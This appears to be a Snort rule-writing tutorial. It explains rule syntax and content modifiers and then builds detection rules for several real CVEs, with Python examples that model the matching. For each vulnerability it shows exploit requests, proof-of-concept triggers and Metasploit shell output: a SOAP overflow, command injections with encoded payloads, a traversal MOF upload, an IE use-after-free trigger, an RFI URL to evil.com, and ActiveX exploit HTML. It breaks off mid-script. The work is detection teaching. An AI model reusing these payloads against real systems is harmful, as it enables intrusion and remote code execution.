Introduction to Snort Rule Writing
Snort Rule Syntax
# rule header
alert tcp any any -> 192.168.1.0/24 111 (
# alert          = rule action
# tcp            = protocol
# any            = src address
# any            = src port
# 192.168.1.0/24 = dst address
# 111            = dst port
Snort Rule Syntax
# rule option format
alert tcp any any -> 192.168.1.0/24 111 (
msg:"Rule Message"; 
# msg            = rule option
# "Rule Message" = rule option argument
rule option: content
# content match example
alert tcp any any -> 192.168.1.0/24 111 (
content:"ABCD"; 
# is equivalent to:
content:"|41 42 43 44|"; 
The content match finds a static pattern in
network data.
content modifiers: nocase
# content match modifiers: nocase
alert tcp any any -> 192.168.1.0/24 111 (
# match "ABCD" or "abcd" etc.
content:"ABCD"; nocase;
nocase makes a content match case insensitive.
content matches are case sensitive by default.
content modifiers: offset
# content match modifiers: offset
alert tcp any any -> 192.168.1.0/24 111 (
# skip 2 bytes before searching for "ABCD"
content:"ABCD"; offset:2;
offset requires the match to occur after the
designated offset in network data.
content modifiers: depth
# content match modifiers: depth
alert tcp any any -> 192.168.1.0/24 111 (
# match "ABCD" within the first 4 bytes of the payload
content:"ABCD"; depth:4;
depth restricts how far Snort should search for
the specified pattern.
content modifiers: distance
# content match modifiers: distance
alert tcp any any -> 192.168.1.0/24 111 (
# find "DEF" 1 byte after "ABC"
content:"ABC"; content:"DEF"; distance:1;
distance specifies how far into a payload Snort
should ignore before starting to search for the
specified pattern relative to the end of the
previous pattern match.
content modifiers: within
# content match modifiers: within
alert tcp any any -> 192.168.1.0/24 111 (
# find "EFG" within 10 bytes of "ABC"
content:"ABC"; content:"EFG"; within:10;
within makes sure that at most N bytes are
between pattern matches.
negated content match
# negated content match
alert tcp any any -> 192.168.1.0/24 111 (
# make sure "EFG" is NOT within 10 bytes of "ABC"
content:"ABC"; content:!"EFG"; within:10;
content matches can be negated.
content buffers
# content buffer example
alert tcp any any -> 192.168.1.0/24 111 (
# match "ABC" within the HTTP URI
content:"ABC"; http_uri;
content matches can be restricted to a payload
location, such as the HTTP URI.
content buffers
POST /index.php HTTP/1.1
Host: example.com
Content-Length: 28
Content-Type: application/x-www-form-urlencoded
Cookie: this_is_a_cookie=this_is_its_value
firstparam=one&secondparam=two
Buffers: http_method http_uri http_header http_cookie
http_client_body
content modifiers: fast_pattern
# fast_pattern example
alert tcp any any -> 192.168.1.0/24 111 (
# set "ABC" as the rule fast_pattern
content:"ABC"; fast_pattern;
fast_pattern explicitly specifies the content
match within a rule to be used with the fast
pattern matcher. The fast_pattern serves as the
“entrance” condition for rule evaluation.
content modifiers: fast_pattern
# fast_pattern:only; example
alert tcp any any -> 192.168.1.0/24 111 (
# set "ABC" as the rule fast_pattern
content:"ABC"; fast_pattern:only;
fast_pattern:only; selects the content match to
be used in the fast pattern matcher for the
rule and also specifies that this match will
not be evaluated again when the rule “enters”.
rule option: pcre
# pcre rule option example
alert tcp any any -> 192.168.1.0/24 111 (
# match the following regex
pcre:"/A[BC]D/i"; 
pcre declares a Perl compatible regular
expression for matching on payload data.
Flags can be specified after the slash.
e.g. /i for case insensitivity.
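Added example (not from the talk or from Snort): a small Python model of how the content modifiers above constrain a chain of matches against one payload, using a constructed payload and this example's own option-dict format.

```python
"""Toy evaluator for Snort content modifiers (nocase, offset, depth,
distance, within, negation). Added example, not code from the talk or
from Snort; option-dict format and function names are this example's own."""


def find_content(payload, needle, start, end, nocase=False):
    """Search payload[start:end] for needle; return the cursor position just
    past the match (Snort's 'end of last match'), or None if it is absent.
    The whole pattern has to fit inside the window, as with Snort's within."""
    if start >= len(payload):
        return None
    hay = payload[start:end]
    if nocase:
        hay, needle = hay.lower(), needle.lower()
    idx = hay.find(needle)
    return None if idx < 0 else start + idx + len(needle)


def evaluate(payload, options):
    """Walk a list of content options left to right the way Snort does.

    Each option is a dict: {"content": b"...", "nocase": bool, "offset": n,
    "depth": n, "distance": n, "within": n, "negated": bool}.
    offset/depth are measured from the start of the payload; distance/within
    are measured from the cursor left by the previous successful match.
    Returns True only if every option is satisfied."""
    cursor = 0
    for opt in options:
        if "distance" in opt or "within" in opt:
            # relative modifiers: window starts `distance` bytes past the cursor
            start = cursor + opt.get("distance", 0)
            end = start + opt["within"] if "within" in opt else len(payload)
        else:
            # absolute modifiers: window starts `offset` bytes into the payload
            start = opt.get("offset", 0)
            end = start + opt["depth"] if "depth" in opt else len(payload)
        hit = find_content(payload, opt["content"], start, end,
                           opt.get("nocase", False))
        if opt.get("negated", False):
            # content:!"..." succeeds when the pattern is NOT in the window
            # and leaves the cursor where it was
            if hit is not None:
                return False
            continue
        if hit is None:
            return False
        cursor = hit
    return True


# Constructed sample payload (not from the talk); offsets chosen so each
# modifier example below has something to bite on.
PAYLOAD = b"xxABCDxDEFyyyyyEFG"


def demo():
    """Return the outcome of each modifier example from the slides."""
    return {
        "nocase":       evaluate(PAYLOAD, [{"content": b"abcd", "nocase": True}]),
        "offset_depth": evaluate(PAYLOAD, [{"content": b"ABCD", "offset": 2, "depth": 4}]),
        "depth_only":   evaluate(PAYLOAD, [{"content": b"ABCD", "depth": 4}]),
        "distance":     evaluate(PAYLOAD, [{"content": b"ABC"},
                                           {"content": b"DEF", "distance": 1}]),
        "within_10":    evaluate(PAYLOAD, [{"content": b"ABC"},
                                           {"content": b"EFG", "within": 10}]),
        "within_13":    evaluate(PAYLOAD, [{"content": b"ABC"},
                                           {"content": b"EFG", "within": 13}]),
        "negated":      evaluate(PAYLOAD, [{"content": b"ABC"},
                                           {"content": b"EFG", "within": 10, "negated": True}]),
    }


if __name__ == "__main__":
    for name, result in demo().items():
        print(f"{name:13} {result}")
```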
Traffic Triage and Isolation
[Diagram: a funnel from high-volume, fast checks to low-volume, slow checks. Normal traffic is narrowed by the fast_pattern and other content matches to vulnerable application traffic, then by further content matches to vulnerable parameter traffic, and finally pcre confirms the vulnerability condition. Axes: traffic volume and matching speed against traffic type.]
Detection Strategies
Detection Topics
> Buffer Overflow
Command Injection
Directory Traversal
Use-After-Free
Remote File Include
Browser Plugins
Cross Site Scripting
Malware Command Traffic
Buffer Overflow Overview
Stack buffer overflow in AVM Fritz!Box daemon
dsl_control.
AVM Fritz!Box firmware fails to check the length of user
supplied data in a 'se' or ScriptExecute command sent in a
SOAP request to the dsl_control daemon.
Buffer Overflow Overview
dsl_cpi_cli_access.c registers the command 'se' to the
DSL_CPE_CLI_ScriptExecute handler function:
[...]
DSL_CPE_CLI_CMD_ADD_COMM (
"se",
"ScriptExecute",
DSL_CPE_CLI_ScriptExecute,
g_sSe);
[...]
Buffer Overflow Overview
DSL_CLI_LOCAL DSL_int_t DSL_CPE_CLI_ScriptExecute([...]) {
[...]
DSL_char_t sFileName[DSL_MAX_COMMAND_LINE_LENGTH] = {0};
if(DSL_CPE_CLI_CheckParamNumber(pCommands,1,
DSL_CLI_EQUALS) == DSL_FALSE)
{
return -1;
}
DSL_CPE_sscanf(pCommands, "%s", sFileName);
[...]
Buffer Overflow Overview
The code calls the function DSL_CPE_sscanf in order to
copy the value of the parameter pCommands to the local
character array sFileName without restriction or bounds
checking. The size of the vulnerable stack buffer is 256
bytes as indicated in dsl_cpi_cli_console.h:
#define DSL_MAX_COMMAND_LINE_LENGTH 256
Triggering the vulnerability is then a simple matter of
sending >256 bytes in the first 'se' parameter.
Buffer Overflow Exploit
<?xml version="1.0" encoding="UTF-8"?>
<SOAP-ENV:Envelope
xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/"
xmlns:ifx="urn:dsl_api">
<SOAP-ENV:Body>
<ifx:DslCpeCliAccess>
<command>se "A"*300</command>
</ifx:DslCpeCliAccess>
</SOAP-ENV:Body>
</SOAP-ENV:Envelope>
Buffer Overflow Detection
# vulnerable SOAP request
# with at least 256 bytes
# within <command></command>
#
content:"DslCpeCliAccess"; fast_pattern:only; http_client_body; 
content:"<command"; nocase; http_client_body; 
isdataat:256,relative; 
content:!"</command"; nocase; within:256; http_client_body; 
# stack buffer overflow (>256 bytes)
# within param0: <command> se param0 </command>
#
pcre:"/<command[^>]*?>\s*se\s[^<]{256}/Pi";
Buffer Overflow Detection
alert tcp $EXTERNAL_NET any -> $HOME_NET 8080 ( 
msg:"SERVER-WEBAPP AVM FritzBox dsl_control stack buffer overflow attempt"; 
flow:to_server,established; 
content:"DslCpeCliAccess"; fast_pattern:only; http_client_body; 
content:"<command"; nocase; http_client_body; 
isdataat:256,relative; 
content:!"</command"; within:256; nocase; http_client_body; 
pcre:"/<command[^>]*?>\s*se\s[^<]{256}/Pi"; 
metadata:policy security-ips drop, service http; 
classtype:attempted-admin; 
)
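To see what each option in the rule above contributes, here is an added Python model (not the talk's or Snort's code) that walks the rule's options over three constructed SOAP bodies; the helper names and the sample bodies are this example's own.

```python
"""Walks the option chain of the dsl_control rule over constructed SOAP
bodies to show what isdataat:256,relative, the negated within:256 content
and the closing pcre each contribute. Added example, not code from the
talk or from Snort."""
import re

# The rule's pcre (/P = match the HTTP client body; /i = case-insensitive).
COMMAND_PCRE = re.compile(rb"<command[^>]*?>\s*se\s[^<]{256}", re.I)


def find_nocase(buf, needle, start=0, end=None):
    """Case-insensitive content search; returns the cursor past the match or None."""
    end = len(buf) if end is None else end
    idx = buf[start:end].lower().find(needle.lower())
    return None if idx < 0 else start + idx + len(needle)


def rule_matches(body):
    """Return (matched, reason) for one HTTP client body, evaluating the
    options in rule order with a cursor the way Snort's relative modifiers do."""
    # content:"DslCpeCliAccess"; fast_pattern:only; http_client_body;
    # (fast_pattern:only patterns are matched case-insensitively by the
    # fast pattern matcher, so nocase is effectively implied)
    if find_nocase(body, b"DslCpeCliAccess") is None:
        return False, "no DslCpeCliAccess element"
    # content:"<command"; nocase; http_client_body;  -> sets the cursor
    cursor = find_nocase(body, b"<command")
    if cursor is None:
        return False, "no <command element"
    # isdataat:256,relative;  -> at least 256 more bytes after the cursor
    if len(body) - cursor < 256:
        return False, "fewer than 256 bytes after <command"
    # content:!"</command"; nocase; within:256; http_client_body;
    # -> the element must NOT be closed inside the next 256 bytes
    if find_nocase(body, b"</command", cursor, cursor + 256) is not None:
        return False, "</command closes within 256 bytes"
    # pcre: confirm it is the 'se' command followed by 256 non-'<' bytes
    if not COMMAND_PCRE.search(body):
        return False, "pcre did not confirm an oversized 'se' parameter"
    return True, "dsl_control stack buffer overflow attempt"


def soap_body(command):
    """Build a constructed DslCpeCliAccess request body around `command`."""
    return (b'<?xml version="1.0" encoding="UTF-8"?>'
            b'<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/"'
            b' xmlns:ifx="urn:dsl_api"><SOAP-ENV:Body><ifx:DslCpeCliAccess>'
            b'<command>' + command + b'</command>'
            b'</ifx:DslCpeCliAccess></SOAP-ENV:Body></SOAP-ENV:Envelope>')


# Constructed samples: a normal script-execute call, the same call with
# trailing padding (long body, short parameter), and the >256-byte
# parameter described in the trigger above.
BENIGN = soap_body(b"se /tmp/startup.cli")
PADDED = soap_body(b"se /tmp/startup.cli") + b" " * 300
OVERFLOW = soap_body(b"se " + b"A" * 300)

if __name__ == "__main__":
    for name, body in (("benign", BENIGN), ("padded", PADDED), ("overflow", OVERFLOW)):
        print(name, rule_matches(body))
```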
Detection Topics
Buffer Overflow
> Command Injection
Directory Traversal
Use-After-Free
Remote File Include
Browser Plugins
Cross Site Scripting
Malware Command Traffic
Command Injection Overview
CVE-2014-3805
Command injection vulnerabilities in AlienVault OSSIM av-centerd, which accepts SOAP commands on port 40007.
SOAP command 'get_log_line' parameter '$number_lines'
and 'get_license' parameter '$license_type' are used in OS
commands without sanitization.
Command Injection Overview
/usr/share/alienvault-center/lib/AV/CC/Util.pm
sub get_log_line() {
my ( $function_llamada, $name, $uuid, $admin_ip,
$hostname, $r_file, $number_lines ) = @_;
[...]
# $number_lines used in OS command without sanitization
my $command = "tail -$number_lines $r_file";
my @content = `$command`;
[...]
}
Command Injection Overview
/usr/share/alienvault-center/lib/AV/CC/Util.pm
sub get_license() {
my ( $function_llamada, $name, $uuid, $admin_ip,
$hostname, $license, $license_type ) = @_;
[...]
# $license_type used in OS command without sanitization
my $package = system ("curl --proxy-anyauth -K /etc/curlrc
http://[...]/avl/$license_type/[...]");
}
Command Injection Exploit
POST /av-centerd HTTP/1.1
Host: 172.16.8.223:40007
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Content-Length: 765
Content-Type: text/xml; charset=utf-8
SOAPAction: "AV/CC/Util#get_log_line"
<?xml version="1.0" encoding="UTF-8"?><soap:Envelope
soap:encodingStyle[...]><soap:Body><get_log_line xmlns="AV/CC/Util"><c-gensym3
xsi:type="xsd:string">All[...]</c-gensym3><c-gensym13
xsi:type="xsd:string">&amp;&amp; perl -MMIME::Base64 -e
&apos;system(decode_base64(&quot;cGVy[...]</c-gensym13></get_log_line></soap:Body></soap:Envelope>
Command Injection Exploit
msf exploit(alienvault_centerd_soap_exec) > exploit
[*] Started reverse handler on 172.16.158.1:4444
[*] Command shell session 1 opened (172.16.158.1:4444 ->
172.16.158.173:41320) at 2014-07-19 12:09:00 -0500
id
uid=0(root) gid=0(root) groups=0(root)
remember traffic isolation...
Command Injection Detection
alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS (
msg:"SERVER-WEBAPP AlienVault OSSIM get_log_line command injection attempt"; 
flow:to_server,established; 
content:"/av-centerd"; nocase; http_uri; 
content:"<get_log_line"; fast_pattern; nocase; http_client_body; 
content:"xsd:string"; distance:0; nocase; http_client_body; 
pcre:"/xsd\x3astring[^>]*?>[^<]*?([\x3b\x7c\x26\x60]|\x24\x28)/Pi"; 
metadata:service http; 
reference:cve,2014-3805; 
classtype:attempted-admin; 
)
Command Injection Detection
alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS (
msg:"SERVER-WEBAPP AlienVault OSSIM get_license command injection attempt"; 
flow:to_server,established; 
content:"/av-centerd"; nocase; http_uri; 
content:"<get_license"; fast_pattern; nocase; http_client_body; 
content:"xsd:string"; distance:0; nocase; http_client_body; 
pcre:"/xsd\x3astring[^>]*?>[^<]*?([\x3b\x7c\x26\x60]|\x24\x28)/Pi"; 
metadata:service http; 
reference:cve,2014-3805; 
classtype:attempted-admin; 
)
Command Injection Overview
CVE-2014-5073
OS command injection vulnerability in VMTurbo
Operations Manager vmtadmin.cgi parameter 'fileDate'.
If the 'callType' parameter is set to "DOWN" vmtadmin.cgi
will pass the value of 'fileDate' to system().
Command Injection Overview
my $actiontype = $query->param("actionType");
my $calltype = $query->param("callType");
my $filedate = $query->param("fileDate");
my $statusfile = (defined $filedate) ? $filedate :
$mon.".".$mday." [...]
[...]
elsif ($calltype eq "DOWN") {
[...]
# $statusfile comes straight from the fileDate parameter
system("rm \"$upload_dir$statusfile\"");
[...]
Command Injection Exploit
GET /cgi-bin/vmtadmin.cgi?callType=DOWN&actionType=CFGBACKUP
&fileDate=%22%60printf%20%27177105114[...] HTTP/1.1
Host: 172.16.41.140
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Content-Type: application/x-www-form-urlencoded
Content-Length: 0
Command Injection Exploit
msf exploit(vmturbo_vmtadmin_exec_noauth) > exploit
[*] Started reverse handler on 172.16.158.1:4444
[*] Command shell session 1 opened (172.16.158.1:4444 ->
172.16.158.173:41320) at 2014-07-19 12:09:00 -0500
id
uid=0(root) gid=0(root) groups=0(root)
Command Injection Detection
# Start by isolating traffic.
alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS ( 
msg:"SERVER-WEBAPP VMTurbo vmtadmin.cgi command injection attempt"; 
flow:to_server,established; 
content:"/cgi-bin/vmtadmin.cgi"; fast_pattern:only; http_uri; 
content:"callType=DOWN"; nocase; http_uri; 
content:"fileDate="; nocase; http_uri; 
pcre:"/[?&]fileDate=[^&]*?([\x60\x3b\x7c]|[\x3c\x3e\x24]\x28)/Ui"; 
metadata:policy security-ips drop, service http; 
reference:cve,2014-5073; 
classtype:attempted-admin; 
)
Command Injection Detection
alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS ( 
msg:"SERVER-WEBAPP VMTurbo vmtadmin.cgi command injection attempt"; 
flow:to_server,established; 
content:"/cgi-bin/vmtadmin.cgi"; fast_pattern:only; http_uri; 
content:"callType=DOWN"; nocase; http_uri; 
content:"fileDate="; nocase; http_raw_uri; 
content:"%26"; distance:0; http_raw_uri; 
pcre:"/[?&]fileDate=[^&]*?%26/Ii"; 
metadata:policy security-ips drop, service http; 
reference:cve,2014-5073; 
classtype:attempted-admin; 
)
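The move from http_uri to http_raw_uri in the second rule is easiest to see side by side; this added Python example (not the talk's or Snort's code) applies both rules' checks to constructed URIs, using urllib's percent-decoding as a stand-in for Snort's URI normalization.

```python
"""Why the second vmtadmin.cgi rule matches the literal %26 in http_raw_uri.
Added example, not code from the talk or from Snort; urllib.parse.unquote
stands in for Snort's http_uri normalization and the URIs are constructed."""
import re
from urllib.parse import unquote

# pcre from rule 1 (/U = normalized URI): a shell metacharacter ` ; |
# or one of <( >( $( inside the fileDate value
META_PCRE = re.compile(r"[?&]fileDate=[^&]*?([\x60\x3b\x7c]|[\x3c\x3e\x24]\x28)", re.I)
# pcre from rule 2 (/I = raw URI): a percent-encoded '&' inside fileDate
RAW_AMP_PCRE = re.compile(r"[?&]fileDate=[^&]*?%26", re.I)


def detect(raw_uri):
    """Return the set of rule names that fire on one request URI.
    The content checks shared by both rules run first; then each rule's
    pcre is applied to the buffer its modifier selects."""
    norm_uri = unquote(raw_uri)          # stand-in for the http_uri buffer
    fired = set()
    # content:"/cgi-bin/vmtadmin.cgi"; fast_pattern:only; http_uri;
    # content:"callType=DOWN"; nocase; http_uri;
    lowered = norm_uri.lower()
    if "/cgi-bin/vmtadmin.cgi" not in lowered or "calltype=down" not in lowered:
        return fired
    # rule 1: content:"fileDate="; nocase; http_uri;  then pcre /Ui
    if "filedate=" in lowered and META_PCRE.search(norm_uri):
        fired.add("metachar")
    # rule 2: content:"fileDate="; nocase; http_raw_uri;
    #         content:"%26"; distance:0; http_raw_uri;  then pcre /Ii
    raw_lower = raw_uri.lower()
    fd = raw_lower.find("filedate=")
    if fd >= 0 and "%26" in raw_lower[fd + len("filedate="):] and RAW_AMP_PCRE.search(raw_uri):
        fired.add("raw_amp")
    return fired


# Constructed URIs in the shape of the request shown above.
BASE = "/cgi-bin/vmtadmin.cgi?callType=DOWN&actionType=CFGBACKUP&fileDate="
BENIGN = BASE + "2014-07-19"
BACKTICK = BASE + "x%60uptime%60"     # normalizes to x`uptime`
ENCODED_AMP = BASE + "x%26%26uptime"  # normalizes to x&&uptime

if __name__ == "__main__":
    for name, uri in (("benign", BENIGN), ("backtick", BACKTICK), ("encoded_amp", ENCODED_AMP)):
        # after normalization the injected '&' splits the parameter, so
        # [^&]*? in rule 1 never reaches a metacharacter; rule 2 sees the raw %26
        print(f"{name:12} normalized={unquote(uri)!r} fired={sorted(detect(uri))}")
```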
Detection Topics
Buffer Overflow
Command Injection
> Directory Traversal
Use-After-Free
Remote File Include
Browser Plugins
Cross Site Scripting
Malware Command Traffic
Directory Traversal Overview
CVE-2014-2424
Directory traversal vulnerability in Oracle Event
Processing. The FileUploadServlet function
processUploadedFile() fails to properly sanitize the
filename parameter value.
The WMI service can be abused to convert the file upload
into remote code execution without user interaction.
Directory Traversal Overview
private void processUploadedFile(FileItem paramFileItem)
{
try {
// paramFileItem.getName() used to
// create file without verification
paramFileItem.write(new File(this.uploadLocation,
paramFileItem.getName()));
} catch (Exception localException) { [...] }
}
Directory Traversal Exploit
POST /wlevs/visualizer/upload HTTP/1.1
Host: 172.16.8.29:9002
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Content-Type: multipart/form-data; boundary=_Part_732_2993821416_1334322828
Content-Length: 2658
--_Part_732_2993821416_1334322828
Content-Disposition: form-data; name="uploadfile";
filename="../../../../../../../WINDOWS/system32/wbem/mof/klIvousnq.mof"
Content-Type: application/octet-stream
Content-Transfer-Encoding: binary
#pragma namespace("\\\\.\\root\\cimv2") [...]
Directory Traversal Exploit
msf exploit(oracle_event_processing_upload) > rexploit
[*] Reloading module...
[*] Started reverse handler on 172.16.158.1:4444
[*] 172.16.158.198:9002 - Generating payload and mof file...
[*] 172.16.158.198:9002 - Uploading the exe payload hENIwUPM.exe...
[*] 172.16.158.198:9002 - Uploading the MOF file klIvousnq.mof
[*] Sending stage (769536 bytes) to 172.16.158.198
[*] Meterpreter session 1 opened (172.16.158.1:4444 -> 172.16.158.198:1052) at
2014-06-29 15:42:37 -0500
[+] Deleted wbem/mof/klIvousnq.mof
[!] This exploit may require manual cleanup of 'hENIwUPM.exe' on the target
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
Directory Traversal Detection
#
# Multipart POST
#
content:"/wlevs/visualizer/upload"; fast_pattern:only; http_uri; 
content:"filename"; nocase; http_client_body; 
content:"Content-Disposition"; nocase; http_client_body; 
pcre:"/filename\s*=\s*[^\r\n]*?(\x2e|%2e){2}([\x2f\x5c]|%2f|%5c)/Pi"; 
#
# Urlencoded POST
#
content:"/wlevs/visualizer/upload"; fast_pattern:only; http_uri; 
content:"filename="; nocase; http_client_body; 
pcre:"/(^|&)filename=[^&]*?(\x2e|%2e){2}([\x2f\x5c]|%2f|%5c)/Pim";
Directory Traversal Detection
alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS ( 
msg:"SERVER-WEBAPP Oracle Event Processing directory traversal attempt"; 
flow:to_server,established; 
content:"/wlevs/visualizer/upload"; fast_pattern:only; http_uri; 
content:"filename"; nocase; http_client_body; 
content:"Content-Disposition"; nocase; http_client_body; 
pcre:"/filename\s*=\s*[^\r\n]*?(\x2e|%2e){2}([\x2f\x5c]|%2f|%5c)/Pi"; 
metadata:policy balanced-ips drop, policy security-ips drop, service http; 
reference:cve,2014-2424; 
classtype:attempted-admin; 
)
Directory Traversal Detection
alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS ( 
msg:"SERVER-WEBAPP Oracle Event Processing directory traversal attempt"; 
flow:to_server,established; 
content:"/wlevs/visualizer/upload"; fast_pattern:only; http_uri; 
content:"filename="; nocase; http_client_body; 
pcre:"/(^|&)filename=[^&]*?(\x2e|%2e){2}([\x2f\x5c]|%2f|%5c)/Pim"; 
metadata:policy balanced-ips drop, policy security-ips drop, service http; 
reference:cve,2014-2424; 
classtype:attempted-admin; 
)
Detection Topics
Buffer Overflow
Command Injection
Directory Traversal
> Use-After-Free
Remote File Include
Browser Plugins
Cross Site Scripting
Malware Command Traffic
Use-After-Free Overview
CVE-2013-3893
This vulnerability is triggered by JavaScript that sets an onlosecapture()
handler on the parent of two elements. This handler clears the DOM with
document.write() when it is called. The JavaScript then calls setCapture() on
the parent and the child element. This triggers the onlosecapture() handler,
freeing a reference with document.write(). After the free, the invalid
reference remains, causing a crash (or code execution) in
MSHTML!CTreeNode::GetInterface.
Use-After-Free Trigger
function trigger()
{
var id_0 = document.createElement("sup");
var id_1 = document.createElement("audio");
document.body.appendChild(id_0);
document.body.appendChild(id_1);
id_1.applyElement(id_0);
id_0.onlosecapture=function(e) {
document.write("");
}
id_0.setCapture();
id_1.setCapture();
}
Use-After-Free Trigger
0:005> r
eax=41414141 ebx=6799799c ecx=679b6a14 edx=00000000 esi=00650d90 edi=021fcb34
eip=679b6b61 esp=021fcb0c ebp=021fcb20 iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246
MSHTML!CTreeNode::GetInterface+0xd8:
679b6b61 8b08 mov ecx,dword ptr [eax] ds:0023:41414141=????????
Use-After-Free Detection
alert tcp $EXTERNAL_NET $FILE_DATA_PORTS -> $HOME_NET any ( 
msg:"BROWSER-IE Microsoft Internet Explorer onlosecapture memory corruption attempt"; 
flow:to_client,established; 
file_data; 
content:".applyElement"; nocase; 
content:".onlosecapture"; nocase; within:500; fast_pattern; 
content:".setCapture"; nocase; within:500; 
content:".setCapture"; nocase; within:500; 
pcre:"/\.applyElement\s*\(\s*(?P<var>\w+)\s*\).*?(?P=var)\.onlosecapture.*?(?P=var)\.setCapture/si"; 
metadata:service ftp-data, service http, service imap, service pop3; 
reference:cve,2013-3893; 
)
Use-After-Free Detection
alert tcp $EXTERNAL_NET any -> $SMTP_SERVERS 25 ( 
msg:"BROWSER-IE Microsoft Internet Explorer onlosecapture memory corruption attempt"; 
flow:to_server,established; 
file_data; 
content:".applyElement"; nocase; 
content:".onlosecapture"; nocase; within:500; fast_pattern; 
content:".setCapture"; nocase; within:500; 
content:".setCapture"; nocase; within:500; 
pcre:"/\.applyElement\s*\(\s*(?P<var>\w+)\s*\).*?(?P=var)\.onlosecapture.*?(?P=var)\.setCapture/si"; 
metadata:service smtp; 
reference:cve,2013-3893; 
)
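An added Python example (not the talk's or Snort's code) that runs the rule's content chain and pcre over the trigger above and over a constructed script that uses the same APIs without wiring them to one element, to show what the named backreference adds.

```python
"""Applies the onlosecapture rule's content chain and pcre to two scripts.
Added example, not code from the talk or from Snort; helper names are this
example's own and the 'benign' script is constructed for the comparison."""
import re

# The rule's pcre: the element passed to applyElement() must be the same
# variable that later receives the onlosecapture handler and setCapture().
UAF_PCRE = re.compile(
    r"\.applyElement\s*\(\s*(?P<var>\w+)\s*\).*?(?P=var)\.onlosecapture"
    r".*?(?P=var)\.setCapture",
    re.S | re.I)


def find_nocase(buf, needle, start=0, end=None):
    """Case-insensitive content search; returns the cursor past the match or None."""
    end = len(buf) if end is None else end
    idx = buf[start:end].lower().find(needle.lower())
    return None if idx < 0 else start + idx + len(needle)


def content_chain(script):
    """The four content options: .applyElement, then .onlosecapture and two
    .setCapture calls, each within 500 bytes of the previous match."""
    cursor = find_nocase(script, ".applyElement")
    if cursor is None:
        return False
    for needle in (".onlosecapture", ".setCapture", ".setCapture"):
        cursor = find_nocase(script, needle, cursor, cursor + 500)
        if cursor is None:
            return False
    return True


def check_rule(script):
    """Return (content_chain_ok, pcre_ok) for a script seen in file_data."""
    return content_chain(script), UAF_PCRE.search(script) is not None


# The trigger from the slides above.
TRIGGER = """
function trigger() {
  var id_0 = document.createElement("sup");
  var id_1 = document.createElement("audio");
  document.body.appendChild(id_0);
  document.body.appendChild(id_1);
  id_1.applyElement(id_0);
  id_0.onlosecapture = function(e) { document.write(""); };
  id_0.setCapture();
  id_1.setCapture();
}
"""

# Constructed benign script: same three APIs, so every content option
# matches, but the handler and capture calls are not on the element that
# was passed to applyElement(), so the backreference cannot be satisfied.
BENIGN = """
var wrap = document.createElement("span");
var inner = document.createElement("b");
wrap.applyElement(inner);
wrap.onlosecapture = function() { console.log("lost capture"); };
inner.setCapture();
wrap.setCapture();
"""

if __name__ == "__main__":
    print("trigger:", check_rule(TRIGGER))
    print("benign: ", check_rule(BENIGN))
```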
Detection Topics
Buffer Overflow
Command Injection
Directory Traversal
Use-After-Free
> Remote File Include
Browser Plugins
Cross Site Scripting
Malware Command Traffic
Remote File Include Overview
CVE-2008-5053
Remote file include vulnerability in Joomla Simple RSS Reader allows execution of
arbitrary PHP code via the parameter mosConfig_live_site in
administrator/components/com_rssreader/admin.rssreader.php:
include("$mosConfig_live_site/components/com_rssreader/about.html");
$mosConfig_live_site is obtained from the GET parameter of the same name sent to
admin.rssreader.php.
Exploit:
http://site/joomlapath/administrator/components/com_rssreader/admin.rssreader.php?mosConfig_live_site=http://evil.com/
Remote File Include Detection
alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS ( 
msg:"SERVER-WEBAPP Joomla admin.rssreader.php remote file include attempt"; 
flow:to_server,established; 
content:"admin.rssreader.php"; fast_pattern:only; http_uri; 
content:"mosConfig_live_site="; nocase; http_uri; 
pcre:"/[?&]mosConfig_live_site=[^&]*?(http|ftp)/Ui"; 
metadata:service http; 
reference:cve,2008-5053; 
classtype:web-application-attack; 
)
Detection Topics
Buffer Overflow
Command Injection
Directory Traversal
Use-After-Free
Remote File Include
> Browser Plugins
Cross Site Scripting
Malware Command Traffic
Browser Plugin Overview
CVE-2012-2516
GE Proficy Historian's KeyHelp.ocx ActiveX control adds HTML Help
functionality for the Proficy enterprise data collection system. It can be
instantiated in a web page using the <object> tag, for example:
<object id="ctrl" classid="clsid:45e66957-2932-432a-a156-31503df0a681">
Or using JavaScript:
obj = new ActiveXObject("KeyHelp.KeyScript")
Browser Plugin Overview
The API of this ActiveX object exposes several methods including
LaunchTriPane(), which has the following prototype:
Void LaunchTriPane(System.string ChmFile)
The function LaunchTriPane will use ShellExecute to launch hh.exe, with user
controlled data as parameters:
> HH.EXE -decompile D:/destination-folder C:/test.chm
This can be abused to write arbitrary files. Code execution is possible by
uploading a WMI .mof file.
Browser Plugin Disassembly
KeyHelp.ocx:
5D335165 CALL KeyHelp.5D31797F
5D33516A JMP SHORT KeyHelp.5D33517D
5D33516C PUSH 5
5D33516E PUSH EDI
5D33516F PUSH ESI ; Malicious command line parameters - no validation
5D335170 PUSH KeyHelp.5D347950 ; ASCII "hh.exe"
5D335175 PUSH EDI
5D335176 PUSH EDI
5D335177 CALL SHELL32.ShellExecuteA ; run hh.exe with malicious params
5D33517D CMP ESI,EDI
5D33517F JE SHORT KeyHelp.5D335187
5D335181 PUSH ESI
Browser Plugin Exploit
<html>
<body><script>
KeyScript = new ActiveXObject("KeyHelp.KeyScript");
ChmPayloadFile = "-decompile C:\\WINDOWS\\system32 "+
"\\\\172.16.211.11\\A5vTb1QLAqfif\\DoixwWS.chm";
ChmMofFile = "-decompile c:\\WINDOWS\\system32\\wbem\\mof "+
"\\\\172.16.211.11\\A5vTb1QLAqfif\\QLQklKr.chm";
KeyScript.LaunchTriPane(ChmPayloadFile);
